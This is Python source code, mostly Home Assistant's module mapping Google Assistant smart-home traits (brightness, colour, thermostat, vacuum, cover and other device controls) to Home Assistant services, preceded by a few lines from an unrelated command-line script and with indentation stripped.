partial(message, '.', nl=False))
message('\b\u2713', fg='green', nl=False)
message('\033[?25h')
message(f'Model name: {filename}')
ctx.exit(0)
if __name__ == '__main__':
cli()
|
"""Implement the Google Smart Home traits."""
from __future__ import annotations
import logging
from homeassistant.components import (
alarm_control_panel,
binary_sensor,
camera,
cover,
fan,
group,
input_boolean,
input_select,
light,
lock,
media_player,
scene,
script,
select,
sensor,
switch,
vacuum,
)
from homeassistant.components.climate import const as climate
from homeassistant.components.humidifier import const as humidifier
from homeassistant.components.lock import STATE_JAMMED, STATE_UNLOCKING
from homeassistant.components.media_player.const import MEDIA_TYPE_CHANNEL
from homeassistant.const import (
ATTR_ASSUMED_STATE,
ATTR_BATTERY_LEVEL,
ATTR_CODE,
ATTR_DEVICE_CLASS,
ATTR_ENTITY_ID,
ATTR_MODE,
ATTR_SUPPORTED_FEATURES,
ATTR_TEMPERATURE,
CAST_APP_ID_HOMEASSISTANT,
SERVICE_ALARM_ARM_AWAY,
SERVICE_ALARM_ARM_CUSTOM_BYPASS,
SERVICE_ALARM_ARM_HOME,
SERVICE_ALARM_ARM_NIGHT,
SERVICE_ALARM_DISARM,
SERVICE_ALARM_TRIGGER,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_CUSTOM_BYPASS,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_ARMED_NIGHT,
STATE_ALARM_DISARMED,
STATE_ALARM_PENDING,
STATE_ALARM_TRIGGERED,
STATE_IDLE,
STATE_LOCKED,
STATE_OFF,
STATE_ON,
STATE_PAUSED,
STATE_PLAYING,
STATE_STANDBY,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from homeassistant.core import DOMAIN as HA_DOMAIN
from homeassistant.helpers.network import get_url
from homeassistant.util import color as color_util, dt, temperature as temp_util
from .const import (
CHALLENGE_ACK_NEEDED,
CHALLENGE_FAILED_PIN_NEEDED,
CHALLENGE_PIN_NEEDED,
ERR_ALREADY_ARMED,
ERR_ALREADY_DISARMED,
ERR_ALREADY_STOPPED,
ERR_CHALLENGE_NOT_SETUP,
ERR_FUNCTION_NOT_SUPPORTED,
ERR_NO_AVAILABLE_CHANNEL,
ERR_NOT_SUPPORTED,
ERR_UNSUPPORTED_INPUT,
ERR_VALUE_OUT_OF_RANGE,
)
from .error import ChallengeNeeded, SmartHomeError
_LOGGER = logging.getLogger(__name__)
PREFIX_TRAITS = "action.devices.traits."
TRAIT_CAMERA_STREAM = f"{PREFIX_TRAITS}CameraStream"
TRAIT_ONOFF = f"{PREFIX_TRAITS}OnOff"
TRAIT_DOCK = f"{PREFIX_TRAITS}Dock"
TRAIT_STARTSTOP = f"{PREFIX_TRAITS}StartStop"
TRAIT_BRIGHTNESS = f"{PREFIX_TRAITS}Brightness"
TRAIT_COLOR_SETTING = f"{PREFIX_TRAITS}ColorSetting"
TRAIT_SCENE = f"{PREFIX_TRAITS}Scene"
TRAIT_TEMPERATURE_SETTING = f"{PREFIX_TRAITS}TemperatureSetting"
TRAIT_TEMPERATURE_CONTROL = f"{PREFIX_TRAITS}TemperatureControl"
TRAIT_LOCKUNLOCK = f"{PREFIX_TRAITS}LockUnlock"
TRAIT_FANSPEED = f"{PREFIX_TRAITS}FanSpeed"
TRAIT_MODES = f"{PREFIX_TRAITS}Modes"
TRAIT_INPUTSELECTOR = f"{PREFIX_TRAITS}InputSelector"
TRAIT_OPENCLOSE = f"{PREFIX_TRAITS}OpenClose"
TRAIT_VOLUME = f"{PREFIX_TRAITS}Volume"
TRAIT_ARMDISARM = f"{PREFIX_TRAITS}ArmDisarm"
TRAIT_HUMIDITY_SETTING = f"{PREFIX_TRAITS}HumiditySetting"
TRAIT_TRANSPORT_CONTROL = f"{PREFIX_TRAITS}TransportControl"
TRAIT_MEDIA_STATE = f"{PREFIX_TRAITS}MediaState"
TRAIT_CHANNEL = f"{PREFIX_TRAITS}Channel"
TRAIT_LOCATOR = f"{PREFIX_TRAITS}Locator"
TRAIT_ENERGYSTORAGE = f"{PREFIX_TRAITS}EnergyStorage"
TRAIT_SENSOR_STATE = f"{PREFIX_TRAITS}SensorState"
PREFIX_COMMANDS = "action.devices.commands."
COMMAND_ONOFF = f"{PREFIX_COMMANDS}OnOff"
COMMAND_GET_CAMERA_STREAM = f"{PREFIX_COMMANDS}GetCameraStream"
COMMAND_DOCK = f"{PREFIX_COMMANDS}Dock"
COMMAND_STARTSTOP = f"{PREFIX_COMMANDS}StartStop"
COMMAND_PAUSEUNPAUSE = f"{PREFIX_COMMANDS}PauseUnpause"
COMMAND_BRIGHTNESS_ABSOLUTE = f"{PREFIX_COMMANDS}BrightnessAbsolute"
COMMAND_COLOR_ABSOLUTE = f"{PREFIX_COMMANDS}ColorAbsolute"
COMMAND_ACTIVATE_SCENE = f"{PREFIX_COMMANDS}ActivateScene"
COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT = (
f"{PREFIX_COMMANDS}ThermostatTemperatureSetpoint"
)
COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE = (
f"{PREFIX_COMMANDS}ThermostatTemperatureSetRange"
)
COMMAND_THERMOSTAT_SET_MODE = f"{PREFIX_COMMANDS}ThermostatSetMode"
COMMAND_LOCKUNLOCK = f"{PREFIX_COMMANDS}LockUnlock"
COMMAND_FANSPEED = f"{PREFIX_COMMANDS}SetFanSpeed"
COMMAND_FANSPEEDRELATIVE = f"{PREFIX_COMMANDS}SetFanSpeedRelative"
COMMAND_MODES = f"{PREFIX_COMMANDS}SetModes"
COMMAND_INPUT = f"{PREFIX_COMMANDS}SetInput"
COMMAND_NEXT_INPUT = f"{PREFIX_COMMANDS}NextInput"
COMMAND_PREVIOUS_INPUT = f"{PREFIX_COMMANDS}PreviousInput"
COMMAND_OPENCLOSE = f"{PREFIX_COMMANDS}OpenClose"
COMMAND_OPENCLOSE_RELATIVE = f"{PREFIX_COMMANDS}OpenCloseRelative"
COMMAND_SET_VOLUME = f"{PREFIX_COMMANDS}setVolume"
COMMAND_VOLUME_RELATIVE = f"{PREFIX_COMMANDS}volumeRelative"
COMMAND_MUTE = f"{PREFIX_COMMANDS}mute"
COMMAND_ARMDISARM = f"{PREFIX_COMMANDS}ArmDisarm"
COMMAND_MEDIA_NEXT = f"{PREFIX_COMMANDS}mediaNext"
COMMAND_MEDIA_PAUSE = f"{PREFIX_COMMANDS}mediaPause"
COMMAND_MEDIA_PREVIOUS = f"{PREFIX_COMMANDS}mediaPrevious"
COMMAND_MEDIA_RESUME = f"{PREFIX_COMMANDS}mediaResume"
COMMAND_MEDIA_SEEK_RELATIVE = f"{PREFIX_COMMANDS}mediaSeekRelative"
COMMAND_MEDIA_SEEK_TO_POSITION = f"{PREFIX_COMMANDS}mediaSeekToPosition"
COMMAND_MEDIA_SHUFFLE = f"{PREFIX_COMMANDS}mediaShuffle"
COMMAND_MEDIA_STOP = f"{PREFIX_COMMANDS}mediaStop"
COMMAND_REVERSE = f"{PREFIX_COMMANDS}Reverse"
COMMAND_SET_HUMIDITY = f"{PREFIX_COMMANDS}SetHumidity"
COMMAND_SELECT_CHANNEL = f"{PREFIX_COMMANDS}selectChannel"
COMMAND_LOCATE = f"{PREFIX_COMMANDS}Locate"
COMMAND_CHARGE = f"{PREFIX_COMMANDS}Charge"
TRAITS = []
def register_trait(trait):
"""Decorate a function to register a trait."""
TRAITS.append(trait)
return trait
def _google_temp_unit(units):
"""Return Google temperature unit."""
if units == TEMP_FAHRENHEIT:
return "F"
return "C"
def _next_selected(items: list[str], selected: str | None) -> str | None:
"""Return the next item in a item list starting at given value.
If selected is missing in items, None is returned
"""
try:
index = items.index(selected)
except ValueError:
return None
next_item = 0 if index == len(items) - 1 else index + 1
return items[next_item]
class _Trait:
"""Represents a Trait inside Google Assistant skill."""
commands = []
@staticmethod
def might_2fa(domain, features, device_class):
"""Return if the trait might ask for 2FA."""
return False
def __init__(self, hass, state, config):
"""Initialize a trait for a state."""
self.hass = hass
self.state = state
self.config = config
def sync_attributes(self):
"""Return attributes for a sync request."""
raise NotImplementedError
def query_attributes(self):
"""Return the attributes of this trait for this entity."""
raise NotImplementedError
def can_execute(self, command, params):
"""Test if command can be executed."""
return command in self.commands
async def execute(self, command, data, params, challenge):
"""Execute a trait command."""
raise NotImplementedError
@register_trait
class BrightnessTrait(_Trait):
"""Trait to control brightness of a device.
https://developers.google.com/actions/smarthome/traits/brightness
"""
name = TRAIT_BRIGHTNESS
commands = [COMMAND_BRIGHTNESS_ABSOLUTE]
@staticmethod
def supported(domain, features, device_class, attributes):
"""Test if state is supported."""
if domain == light.DOMAIN:
color_modes = attributes.get(light.ATTR_SUPPORTED_COLOR_MODES)
return light.brightness_supported(color_modes)
return False
def sync_attributes(self):
"""Return brightness attributes for a sync request."""
return {}
def query_attributes(self):
"""Return brightness query attributes."""
domain = self.state.domain
response = {}
if domain == light.DOMAIN:
brightness = self.state.attributes.get(light.ATTR_BRIGHTNESS)
if brightness is not None:
response["brightness"] = int(100 * (brightness / 255))
else:
response["brightness"] = 0
return response
async def execute(self, command, data, params, challenge):
"""Execute a brightness command."""
domain = self.state.domain
if domain == light.DOMAIN:
await self.hass.services.async_call(
light.DOMAIN,
light.SERVICE_TURN_ON,
{
ATTR_ENTITY_ID: self.state.entity_id,
light.ATTR_BRIGHTNESS_PCT: params["brightness"],
},
blocking=True,
context=data.context,
)
@register_trait
class CameraStreamTrait(_Trait):
"""Trait to stream from cameras.
https://developers.google.com/actions/smarthome/traits/camerastream
"""
name = TRAIT_CAMERA_STREAM
commands = [COMMAND_GET_CAMERA_STREAM]
stream_info = None
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == camera.DOMAIN:
return features & camera.SUPPORT_STREAM
return False
def sync_attributes(self):
"""Return stream attributes for a sync request."""
return {
"cameraStreamSupportedProtocols": ["hls"],
"cameraStreamNeedAuthToken": False,
"cameraStreamNeedDrmEncryption": False,
}
def query_attributes(self):
"""Return camera stream attributes."""
return self.stream_info or {}
async def execute(self, command, data, params, challenge):
"""Execute a get camera stream command."""
url = await self.hass.components.camera.async_request_stream(
self.state.entity_id, "hls"
)
self.stream_info = {
"cameraStreamAccessUrl": f"{get_url(self.hass)}{url}",
"cameraStreamReceiverAppId": CAST_APP_ID_HOMEASSISTANT,
}
@register_trait
class OnOffTrait(_Trait):
"""Trait to offer basic on and off functionality.
https://developers.google.com/actions/smarthome/traits/onoff
"""
name = TRAIT_ONOFF
commands = [COMMAND_ONOFF]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain in (
group.DOMAIN,
input_boolean.DOMAIN,
switch.DOMAIN,
fan.DOMAIN,
light.DOMAIN,
media_player.DOMAIN,
humidifier.DOMAIN,
)
def sync_attributes(self):
"""Return OnOff attributes for a sync request."""
if self.state.attributes.get(ATTR_ASSUMED_STATE, False):
return {"commandOnlyOnOff": True}
return {}
def query_attributes(self):
"""Return OnOff query attributes."""
return {"on": self.state.state not in (STATE_OFF, STATE_UNKNOWN)}
async def execute(self, command, data, params, challenge):
"""Execute an OnOff command."""
domain = self.state.domain
if domain == group.DOMAIN:
service_domain = HA_DOMAIN
service = SERVICE_TURN_ON if params["on"] else SERVICE_TURN_OFF
else:
service_domain = domain
service = SERVICE_TURN_ON if params["on"] else SERVICE_TURN_OFF
await self.hass.services.async_call(
service_domain,
service,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
@register_trait
class ColorSettingTrait(_Trait):
"""Trait to offer color temperature functionality.
https://developers.google.com/actions/smarthome/traits/colortemperature
"""
name = TRAIT_COLOR_SETTING
commands = [COMMAND_COLOR_ABSOLUTE]
@staticmethod
def supported(domain, features, device_class, attributes):
"""Test if state is supported."""
if domain != light.DOMAIN:
return False
color_modes = attributes.get(light.ATTR_SUPPORTED_COLOR_MODES)
return light.color_temp_supported(color_modes) or light.color_supported(
color_modes
)
def sync_attributes(self):
"""Return color temperature attributes for a sync request."""
attrs = self.state.attributes
color_modes = attrs.get(light.ATTR_SUPPORTED_COLOR_MODES)
response = {}
if light.color_supported(color_modes):
response["colorModel"] = "hsv"
if light.color_temp_supported(color_modes):
# Max Kelvin is Min Mireds K = 1000000 / mireds
# Min Kelvin is Max Mireds K = 1000000 / mireds
response["colorTemperatureRange"] = {
"temperatureMaxK": color_util.color_temperature_mired_to_kelvin(
attrs.get(light.ATTR_MIN_MIREDS)
),
"temperatureMinK": color_util.color_temperature_mired_to_kelvin(
attrs.get(light.ATTR_MAX_MIREDS)
),
}
return response
def query_attributes(self):
"""Return color temperature query attributes."""
color_mode = self.state.attributes.get(light.ATTR_COLOR_MODE)
color = {}
if light.color_supported([color_mode]):
color_hs = self.state.attributes.get(light.ATTR_HS_COLOR)
brightness = self.state.attributes.get(light.ATTR_BRIGHTNESS, 1)
if color_hs is not None:
color["spectrumHsv"] = {
"hue": color_hs[0],
"saturation": color_hs[1] / 100,
"value": brightness / 255,
}
if light.color_temp_supported([color_mode]):
temp = self.state.attributes.get(light.ATTR_COLOR_TEMP)
# Some faulty integrations might put 0 in here, raising exception.
if temp == 0:
_LOGGER.warning(
"Entity %s has incorrect color temperature %s",
self.state.entity_id,
temp,
)
elif temp is not None:
color["temperatureK"] = color_util.color_temperature_mired_to_kelvin(
temp
)
response = {}
if color:
response["color"] = color
return response
async def execute(self, command, data, params, challenge):
"""Execute a color temperature command."""
if "temperature" in params["color"]:
temp = color_util.color_temperature_kelvin_to_mired(
params["color"]["temperature"]
)
min_temp = self.state.attributes[light.ATTR_MIN_MIREDS]
max_temp = self.state.attributes[light.ATTR_MAX_MIREDS]
if temp < min_temp or temp > max_temp:
raise SmartHomeError(
ERR_VALUE_OUT_OF_RANGE,
f"Temperature should be between {min_temp} and {max_temp}",
)
await self.hass.services.async_call(
light.DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: self.state.entity_id, light.ATTR_COLOR_TEMP: temp},
blocking=True,
context=data.context,
)
elif "spectrumRGB" in params["color"]:
# Convert integer to hex format and left pad with 0's till length 6
hex_value = f"{params["color"]["spectrumRGB"]:06x}"
color = color_util.color_RGB_to_hs(
*color_util.rgb_hex_to_rgb_list(hex_value)
)
await self.hass.services.async_call(
light.DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: self.state.entity_id, light.ATTR_HS_COLOR: color},
blocking=True,
context=data.context,
)
elif "spectrumHSV" in params["color"]:
color = params["color"]["spectrumHSV"]
saturation = color["saturation"] * 100
brightness = color["value"] * 255
await self.hass.services.async_call(
light.DOMAIN,
SERVICE_TURN_ON,
{
ATTR_ENTITY_ID: self.state.entity_id,
light.ATTR_HS_COLOR: [color["hue"], saturation],
light.ATTR_BRIGHTNESS: brightness,
},
blocking=True,
context=data.context,
)
@register_trait
class SceneTrait(_Trait):
"""Trait to offer scene functionality.
https://developers.google.com/actions/smarthome/traits/scene
"""
name = TRAIT_SCENE
commands = [COMMAND_ACTIVATE_SCENE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain in (scene.DOMAIN, script.DOMAIN)
def sync_attributes(self):
"""Return scene attributes for a sync request."""
# Neither supported domain can support sceneReversible
return {}
def query_attributes(self):
"""Return scene query attributes."""
return {}
async def execute(self, command, data, params, challenge):
"""Execute a scene command."""
# Don't block for scripts as they can be slow.
await self.hass.services.async_call(
self.state.domain,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=self.state.domain != script.DOMAIN,
context=data.context,
)
@register_trait
class DockTrait(_Trait):
"""Trait to offer dock functionality.
https://developers.google.com/actions/smarthome/traits/dock
"""
name = TRAIT_DOCK
commands = [COMMAND_DOCK]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == vacuum.DOMAIN
def sync_attributes(self):
"""Return dock attributes for a sync request."""
return {}
def query_attributes(self):
"""Return dock query attributes."""
return {"isDocked": self.state.state == vacuum.STATE_DOCKED}
async def execute(self, command, data, params, challenge):
"""Execute a dock command."""
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_RETURN_TO_BASE,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
@register_trait
class LocatorTrait(_Trait):
"""Trait to offer locate functionality.
https://developers.google.com/actions/smarthome/traits/locator
"""
name = TRAIT_LOCATOR
commands = [COMMAND_LOCATE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == vacuum.DOMAIN and features & vacuum.SUPPORT_LOCATE
def sync_attributes(self):
"""Return locator attributes for a sync request."""
return {}
def query_attributes(self):
"""Return locator query attributes."""
return {}
async def execute(self, command, data, params, challenge):
"""Execute a locate command."""
if params.get("silence", False):
raise SmartHomeError(
ERR_FUNCTION_NOT_SUPPORTED,
"Silencing a Locate request is not yet supported",
)
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_LOCATE,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
@register_trait
class EnergyStorageTrait(_Trait):
"""Trait to offer EnergyStorage functionality.
https://developers.google.com/actions/smarthome/traits/energystorage
"""
name = TRAIT_ENERGYSTORAGE
commands = [COMMAND_CHARGE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == vacuum.DOMAIN and features & vacuum.SUPPORT_BATTERY
def sync_attributes(self):
"""Return EnergyStorage attributes for a sync request."""
return {
"isRechargeable": True,
"queryOnlyEnergyStorage": True,
}
def query_attributes(self):
"""Return EnergyStorage query attributes."""
battery_level = self.state.attributes.get(ATTR_BATTERY_LEVEL)
if battery_level == 100:
descriptive_capacity_remaining = "FULL"
elif 75 <= battery_level < 100:
descriptive_capacity_remaining = "HIGH"
elif 50 <= battery_level < 75:
descriptive_capacity_remaining = "MEDIUM"
elif 25 <= battery_level < 50:
descriptive_capacity_remaining = "LOW"
elif 0 <= battery_level < 25:
descriptive_capacity_remaining = "CRITICALLY_LOW"
return {
"descriptiveCapacityRemaining": descriptive_capacity_remaining,
"capacityRemaining": [{"rawValue": battery_level, "unit": "PERCENTAGE"}],
"capacityUntilFull": [
{"rawValue": 100 - battery_level, "unit": "PERCENTAGE"}
],
"isCharging": self.state.state == vacuum.STATE_DOCKED,
"isPluggedIn": self.state.state == vacuum.STATE_DOCKED,
}
async def execute(self, command, data, params, challenge):
"""Execute a dock command."""
raise SmartHomeError(
ERR_FUNCTION_NOT_SUPPORTED,
"Controlling charging of a vacuum is not yet supported",
)
@register_trait
class StartStopTrait(_Trait):
"""Trait to offer StartStop functionality.
https://developers.google.com/actions/smarthome/traits/startstop
"""
name = TRAIT_STARTSTOP
commands = [COMMAND_STARTSTOP, COMMAND_PAUSEUNPAUSE]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == vacuum.DOMAIN:
return True
if domain == cover.DOMAIN and features & cover.SUPPORT_STOP:
return True
return False
def sync_attributes(self):
"""Return StartStop attributes for a sync request."""
domain = self.state.domain
if domain == vacuum.DOMAIN:
return {
"pausable": self.state.attributes.get(ATTR_SUPPORTED_FEATURES, 0)
& vacuum.SUPPORT_PAUSE
!= 0
}
if domain == cover.DOMAIN:
return {}
def query_attributes(self):
"""Return StartStop query attributes."""
domain = self.state.domain
state = self.state.state
if domain == vacuum.DOMAIN:
return {
"isRunning": state == vacuum.STATE_CLEANING,
"isPaused": state == vacuum.STATE_PAUSED,
}
if domain == cover.DOMAIN:
return {"isRunning": state in (cover.STATE_CLOSING, cover.STATE_OPENING)}
async def execute(self, command, data, params, challenge):
"""Execute a StartStop command."""
domain = self.state.domain
if domain == vacuum.DOMAIN:
return await self._execute_vacuum(command, data, params, challenge)
if domain == cover.DOMAIN:
return await self._execute_cover(command, data, params, challenge)
async def _execute_vacuum(self, command, data, params, challenge):
"""Execute a StartStop command."""
if command == COMMAND_STARTSTOP:
if params["start"]:
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_START,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
else:
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_STOP,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
elif command == COMMAND_PAUSEUNPAUSE:
if params["pause"]:
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_PAUSE,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
else:
await self.hass.services.async_call(
self.state.domain,
vacuum.SERVICE_START,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
async def _execute_cover(self, command, data, params, challenge):
"""Execute a StartStop command."""
if command == COMMAND_STARTSTOP:
if params["start"] is False:
if (
self.state.state
in (
cover.STATE_CLOSING,
cover.STATE_OPENING,
)
or self.state.attributes.get(ATTR_ASSUMED_STATE)
):
await self.hass.services.async_call(
self.state.domain,
cover.SERVICE_STOP_COVER,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
else:
raise SmartHomeError(
ERR_ALREADY_STOPPED, "Cover is already stopped"
)
else:
raise SmartHomeError(
ERR_NOT_SUPPORTED, "Starting a cover is not supported"
)
else:
raise SmartHomeError(
ERR_NOT_SUPPORTED, f"Command {command} is not supported"
)
@register_trait
class TemperatureControlTrait(_Trait):
"""Trait for devices (other than thermostats) that support controlling temperature. Workaround for Temperature sensors.
https://developers.google.com/assistant/smarthome/traits/temperaturecontrol
"""
name = TRAIT_TEMPERATURE_CONTROL
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return (
domain == sensor.DOMAIN and device_class == sensor.DEVICE_CLASS_TEMPERATURE
)
def sync_attributes(self):
"""Return temperature attributes for a sync request."""
return {
"temperatureUnitForUX": _google_temp_unit(
self.hass.config.units.temperature_unit
),
"queryOnlyTemperatureSetting": True,
"temperatureRange": {
"minThresholdCelsius": -100,
"maxThresholdCelsius": 100,
},
}
def query_attributes(self):
"""Return temperature states."""
response = {}
unit = self.hass.config.units.temperature_unit
current_temp = self.state.state
if current_temp not in (STATE_UNKNOWN, STATE_UNAVAILABLE):
temp = round(temp_util.convert(float(current_temp), unit, TEMP_CELSIUS), 1)
response["temperatureSetpointCelsius"] = temp
response["temperatureAmbientCelsius"] = temp
return response
async def execute(self, command, data, params, challenge):
"""Unsupported."""
raise SmartHomeError(ERR_NOT_SUPPORTED, "Execute is not supported by sensor")
@register_trait
class TemperatureSettingTrait(_Trait):
"""Trait to offer handling both temperature point and modes functionality.
https://developers.google.com/actions/smarthome/traits/temperaturesetting
"""
name = TRAIT_TEMPERATURE_SETTING
commands = [
COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE,
COMMAND_THERMOSTAT_SET_MODE,
]
# We do not support "on" as we are unable to know how to restore
# the last mode.
hvac_to_google = {
climate.HVAC_MODE_HEAT: "heat",
climate.HVAC_MODE_COOL: "cool",
climate.HVAC_MODE_OFF: "off",
climate.HVAC_MODE_AUTO: "auto",
climate.HVAC_MODE_HEAT_COOL: "heatcool",
climate.HVAC_MODE_FAN_ONLY: "fan-only",
climate.HVAC_MODE_DRY: "dry",
}
google_to_hvac = {value: key for key, value in hvac_to_google.items()}
preset_to_google = {climate.PRESET_ECO: "eco"}
google_to_preset = {value: key for key, value in preset_to_google.items()}
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
return domain == climate.DOMAIN
@property
def climate_google_modes(self):
"""Return supported Google modes."""
modes = []
attrs = self.state.attributes
for mode in attrs.get(climate.ATTR_HVAC_MODES, []):
google_mode = self.hvac_to_google.get(mode)
if google_mode and google_mode not in modes:
modes.append(google_mode)
for preset in attrs.get(climate.ATTR_PRESET_MODES, []):
google_mode = self.preset_to_google.get(preset)
if google_mode and google_mode not in modes:
modes.append(google_mode)
return modes
def sync_attributes(self):
"""Return temperature point and modes attributes for a sync request."""
response = {}
response["thermostatTemperatureUnit"] = _google_temp_unit(
self.hass.config.units.temperature_unit
)
modes = self.climate_google_modes
# Some integrations don't support modes (e.g. opentherm), but Google doesn't
# support changing the temperature if we don't have any modes. If there's
# only one Google doesn't support changing it, so the default mode here is
# only cosmetic.
if len(modes) == 0:
modes.append("heat")
if "off" in modes and any(
mode in modes for mode in ("heatcool", "heat", "cool")
):
modes.append("on")
response["availableThermostatModes"] = modes
return response
def query_attributes(self):
"""Return temperature point and modes query attributes."""
response = {}
attrs = self.state.attributes
unit = self.hass.config.units.temperature_unit
operation = self.state.state
preset = attrs.get(climate.ATTR_PRESET_MODE)
supported = attrs.get(ATTR_SUPPORTED_FEATURES, 0)
if preset in self.preset_to_google:
response["thermostatMode"] = self.preset_to_google[preset]
else:
response["thermostatMode"] = self.hvac_to_google.get(operation, "none")
current_temp = attrs.get(climate.ATTR_CURRENT_TEMPERATURE)
if current_temp is not None:
response["thermostatTemperatureAmbient"] = round(
temp_util.convert(current_temp, unit, TEMP_CELSIUS), 1
)
current_humidity = attrs.get(climate.ATTR_CURRENT_HUMIDITY)
if current_humidity is not None:
response["thermostatHumidityAmbient"] = current_humidity
if operation in (climate.HVAC_MODE_AUTO, climate.HVAC_MODE_HEAT_COOL):
if supported & climate.SUPPORT_TARGET_TEMPERATURE_RANGE:
response["thermostatTemperatureSetpointHigh"] = round(
temp_util.convert(
attrs[climate.ATTR_TARGET_TEMP_HIGH], unit, TEMP_CELSIUS
),
1,
)
response["thermostatTemperatureSetpointLow"] = round(
temp_util.convert(
attrs[climate.ATTR_TARGET_TEMP_LOW], unit, TEMP_CELSIUS
),
1,
)
else:
if (target_temp := attrs.get(ATTR_TEMPERATURE)) is not None:
target_temp = round(
temp_util.convert(target_temp, unit, TEMP_CELSIUS), 1
)
response["thermostatTemperatureSetpointHigh"] = target_temp
response["thermostatTemperatureSetpointLow"] = target_temp
else:
if (target_temp := attrs.get(ATTR_TEMPERATURE)) is not None:
response["thermostatTemperatureSetpoint"] = round(
temp_util.convert(target_temp, unit, TEMP_CELSIUS), 1
)
return response
async def execute(self, command, data, params, challenge):
"""Execute a temperature point or mode command."""
# All sent in temperatures are always in Celsius
unit = self.hass.config.units.temperature_unit
min_temp = self.state.attributes[climate.ATTR_MIN_TEMP]
max_temp = self.state.attributes[climate.ATTR_MAX_TEMP]
if command == COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT:
temp = temp_util.convert(
params["thermostatTemperatureSetpoint"], TEMP_CELSIUS, unit
)
if unit == TEMP_FAHRENHEIT:
temp = round(temp)
if temp < min_temp or temp > max_temp:
raise SmartHomeError(
ERR_VALUE_OUT_OF_RANGE,
f"Temperature should be between {min_temp} and {max_temp}",
)
await self.hass.services.async_call(
climate.DOMAIN,
climate.SERVICE_SET_TEMPERATURE,
{ATTR_ENTITY_ID: self.state.entity_id, ATTR_TEMPERATURE: temp},
blocking=True,
context=data.context,
)
elif command == COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE:
temp_high = temp_util.convert(
params["thermostatTemperatureSetpointHigh"], TEMP_CELSIUS, unit
)
if unit == TEMP_FAHRENHEIT:
temp_high = round(temp_high)
if temp_high < min_temp or temp_high > max_temp:
raise SmartHomeError(
ERR_VALUE_OUT_OF_RANGE,
(
f"Upper bound for temperature range should be between "
f"{min_temp} and {max_temp}"
),
)
temp_low = temp_util.convert(
params["thermostatTemperatureSetpointLow"], TEMP_CELSIUS, unit
)
if unit == TEMP_FAHRENHEIT:
temp_low = round(temp_low)
if temp_low < min_temp or temp_low > max_temp:
raise SmartHomeError(
ERR_VALUE_OUT_OF_RANGE,
(
f"Lower bound for temperature range should be between "
f"{min_temp} and {max_temp}"
),
)
supported = self.state.attributes.get(ATTR_SUPPORTED_FEATURES)
svc_data = {ATTR_ENTITY_ID: self.state.entity_id}
if supported & climate.SUPPORT_TARGET_TEMPERATURE_RANGE:
svc_data[climate.ATTR_TARGET_TEMP_HIGH] = temp_high
svc_data[climate.ATTR_TARGET_TEMP_LOW] = temp_low
else:
svc_data[ATTR_TEMPERATURE] = (temp_high + temp_low) / 2
await self.hass.services.async_call(
climate.DOMAIN,
climate.SERVICE_SET_TEMPERATURE,
svc_data,
blocking=True,
context=data.context,
)
elif command == COMMAND_THERMOSTAT_SET_MODE:
target_mode = params["thermostatMode"]
supported = self.state.attributes.get(ATTR_SUPPORTED_FEATURES)
if target_mode == "on":
await self.hass.services.async_call(
climate.DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
return
if target_mode == "off":
await self.hass.services.async_call(
climate.DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: self.state.entity_id},
blocking=True,
context=data.context,
)
return
if target_mode in self.google_to_preset:
await self.hass.services.async_call(
climate.DOMAIN,
climate.SERVICE_SET_PRESET_MODE,
{
climate.ATTR_PRESET_MODE: self.google_to_preset[target_mode],
ATTR_ENTITY_ID: self.state.entity_id,
},
blocking=True,
context=data.context,
)
return
await self.hass.services.async_call(
climate.DOMAIN,
climate.SERVICE_SET_HVAC_MODE,
{
ATTR_ENTITY_ID: self.state.entity_id,
climate.ATTR_HVAC_MODE: self.google_to_hvac[target_mode],
},
blocking=True,
context=data.context,
)
@register_trait
class HumiditySettingTrait(_Trait):
"""Trait to offer humidity setting functionality.
https://developers.google.com/actions/smarthome/traits/humiditysetting
"""
name = TRAIT_HUMIDITY_SETTING
commands = [COMMAND_SET_HUMIDITY]
@staticmethod
def supported(domain, features, device_class, _):
"""Test if state is supported."""
if domain == humidifier.DOMAIN:
return True
return domain == sensor.DOMAIN and device_class == sensor.DEVICE_CLASS_HUMIDITY
